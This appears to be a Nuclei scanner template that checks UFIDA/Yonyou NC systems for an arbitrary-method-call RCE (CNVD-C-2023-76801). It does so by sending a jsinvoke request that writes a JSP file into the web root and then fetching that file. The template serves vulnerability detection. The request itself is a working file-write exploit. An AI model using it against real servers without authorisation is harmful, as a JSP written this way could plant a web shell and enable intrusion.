32 lines
1.2 KiB
YAML
32 lines
1.2 KiB
YAML
id: CNVD-C-2023-76801
|
|
|
|
info:
|
|
name: UFIDA NC uapjs - RCE vulnerability
|
|
author: SleepingBag945
|
|
severity: critical
|
|
description: There is an arbitrary method calling vulnerability in UFIDA NC and NCC systems. By exploiting the vulnerability through uapjs (jsinvoke), dangerous methods can be called to cause attacks.
|
|
metadata:
|
|
max-request: 2
|
|
tags: cnvd,cnvd2023,yonyou,rce,intrusive
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
|
|
|
|
{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig",
|
|
"parameterTypes":["java.lang.Object","java.lang.String"],
|
|
"parameters":["{{randstr_2}}","webapps/nc_web/{{randstr_1}}.jsp"]}
|
|
- |
|
|
GET /{{randstr_1}}.jsp HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- status_code_1 == 200
|
|
- status_code_2 == 200 && contains(body_2,"{{randstr_2}}")
|
|
condition: and
|
|
# digest: 4b0a00483046022100998225dae1eaa205075155ab10edbd8b2dbae58d976e5d4415f662ccd76ec102022100dafe4c8d3a42c6210d8e7847658fa39c5828b806052a30c28d09e00669e864bb:922c64590222798bb761d5b6d8e72950 |